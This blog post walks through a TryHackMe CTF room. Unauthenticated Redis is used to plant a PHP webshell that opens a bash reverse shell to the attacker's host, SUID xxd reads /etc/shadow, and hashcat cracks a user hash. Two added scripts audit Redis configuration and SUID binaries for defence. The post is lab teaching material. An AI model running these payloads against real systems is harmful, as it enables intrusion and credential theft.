narancs's blog

TryHackMe – Res walkthrough

TryHackMe Res CTF room logo

Introduction

Res is a semi-guided CTF room on TryHackMe. We need to exploit Redis to get a shell on the target. Then we need to use an SUID binary and password cracking to gain elevated privileges.

Enumeration

Since this is a semi-guided room, we have some questions that help us step-by-step:

  • Scan the machine, how many ports are open?
  • What is the database management system installed on the server?
  • What port is the database management system running on?
  • What is the version of the management system installed on the server?
  • Compromise the machine and locate user.txt
  • What is the local user account password?
  • Escalate privileges and obtain root.txt

I started with nmap to check open ports on the target.

From the nmap output above we can answer the first four questions.

The next task is:

  • Compromise the machine and locate user.txt

User flag

On this particular machine we can access the Redis service without credentials.

Connect to the Redis service with redis-cli:

    redis-cli -h MACHINE_IP

To exploit Redis, I used the ‘Redis RCE / Webshell’ technique from https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

We need to know the document root of the website. If we visit the site, it is shown on the default page:

Then run the following commands in redis-cli to write a reverse shell into the document root of the website:

    config set dir /var/www/html
    config set dbfilename redis.php
    set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/<LOCAL IP>/<LOCAL PORT> 0>&1'\"); ?>"
    save

I started a listener and triggered the reverse shell by visiting http://MACHINE_IP/redis.php.
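The steps above work only because the Redis instance accepts unauthenticated clients and lets them change `dir` and `dbfilename`. As an added defender-side example (not part of the original write-up), the following POSIX shell function audits a redis.conf for exactly those weak settings; the two configuration fragments are constructed for the demonstration and do not come from the room's machine.

```sh
#!/bin/sh
# Constructed redis.conf fragment with the settings that make the attack above
# possible (hypothetical content, not copied from the target).
WEAK_CONF='bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
'

# Constructed hardened counterpart: loopback only, protected mode, a password,
# and CONFIG disabled so clients cannot redirect the dump file.
HARDENED_CONF='bind 127.0.0.1
protected-mode yes
port 6379
requirepass CHANGE_ME_TO_A_LONG_RANDOM_VALUE
rename-command CONFIG ""
dir /var/lib/redis
'

# audit_redis_conf FILE
# Prints one finding per line and returns 1 if anything was found, 0 otherwise.
audit_redis_conf() {
    conf="$1"
    rc=0
    if ! grep -Eq '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]+' "$conf"; then
        echo "no requirepass: any client that reaches the port can issue CONFIG SET"
        rc=1
    fi
    if grep -Eq '^[[:space:]]*protected-mode[[:space:]]+no' "$conf"; then
        echo "protected-mode no: remote unauthenticated clients are accepted"
        rc=1
    fi
    if grep -Eq '^[[:space:]]*bind[[:space:]]+.*0\.0\.0\.0' "$conf"; then
        echo "bind 0.0.0.0: Redis listens on every interface"
        rc=1
    fi
    if ! grep -Eq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]+' "$conf"; then
        echo "CONFIG not renamed or disabled: clients can change dir and dbfilename"
        rc=1
    fi
    return $rc
}

# audit_string CONTENT: write CONTENT to a temp file, audit it, clean up,
# and pass the audit result through as the return code.
audit_string() {
    tmp=$(mktemp)
    printf '%s' "$1" > "$tmp"
    audit_redis_conf "$tmp"
    status=$?
    rm -f "$tmp"
    return $status
}

# Stand-alone demonstration on both constructed fragments.
echo "== weak config =="
audit_string "$WEAK_CONF" || echo "(findings above must be fixed)"
echo "== hardened config =="
audit_string "$HARDENED_CONF" && echo "no findings"
```

On a real host, run `audit_redis_conf /etc/redis/redis.conf`; the check only inspects the file, so it is safe to run from configuration management or a scheduled job.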

I received a shell as the www-data user. Then I upgraded it to a fully interactive TTY with the following commands:

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    # press CTRL+Z to background the shell
    stty raw -echo; fg

I was able to read the user flag from /home/vianka/user.txt.

Root flag

One of the things I checked for privilege escalation is the list of files that have the SUID bit set:

    find / -perm /4000 -type f 2> /dev/null

The file that stood out was /usr/bin/xxd. GTFOBins shows how to read arbitrary files with it.
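The find command above is the same one a defender can use to catch this misconfiguration before an attacker does. As an added example (not part of the original write-up), the shell function below compares a list of SUID files against a baseline of expected entries and prints whatever is not on the baseline; both the sample listing and the baseline are constructed for the demonstration, and a real baseline should be generated from a clean image of the same distribution.

```sh
#!/bin/sh
# Constructed sample of what the find command might return (hypothetical
# paths, not the room's actual listing).
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/xxd
/usr/bin/newgrp
/opt/backup/helper
'

# Assumed baseline of SUID binaries that are expected on the host. This short
# list is illustrative only; build yours from a known-good system.
BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
'

# unexpected_suid
# Reads one SUID path per line on stdin and prints every path that is not in
# BASELINE. Returns 0 whether or not anything was printed.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -F: literal match, -x: whole line, so /usr/bin/su does not match
        # /usr/bin/sudo and vice versa.
        if ! printf '%s\n' "$BASELINE" | grep -Fxq -- "$path"; then
            echo "$path"
        fi
    done
    return 0
}

# Stand-alone demonstration on the constructed sample. On a live host replace
# the printf with: find / -perm /4000 -type f 2>/dev/null
echo "== SUID files not in baseline =="
printf '%s' "$SAMPLE_SUID" | unexpected_suid
```

Anything the function prints deserves a look: a binary such as xxd or a custom helper under /opt with the SUID bit set is rarely intentional, and removing the bit with `chmod u-s` closes the path used later in this write-up.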

For the next question we need to know the password of the vianka user, so I used xxd to read the /etc/shadow file:

    xxd /etc/shadow | xxd -r

Then I used hashcat to crack the password (mode 1800 is sha512crypt, the $6$ format used in /etc/shadow):

    hashcat -a 0 -m 1800 '$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0' /usr/share/wordlists/rockyou.txt --quiet

Now we have the answer for question 6.

The last question was to get the root flag. I switched to the vianka user with the cracked password. Then I checked sudo privileges: vianka can run any command with sudo.

vianka's sudo capabilities
I switched to root with the sudo -i command and read the flag from /root/root.txt.

Summary

The Res CTF room is a relatively easy and straightforward room on TryHackMe. There is not much to find on the machine: only an HTTP server serving the default page and a Redis server. The questions also lead us step by step through exploiting the target.

First I exploited the unauthenticated Redis access and used it to write a reverse shell into the document root of the web server. After getting a shell on the target, I found that the xxd binary had the SUID bit set.

I used xxd to read the /etc/shadow file and get the password hash of the vianka user. I cracked the hash with hashcat and switched to the vianka user. Vianka had privileges to run any command as root with sudo, so I was able to switch to the root user and get the flag.
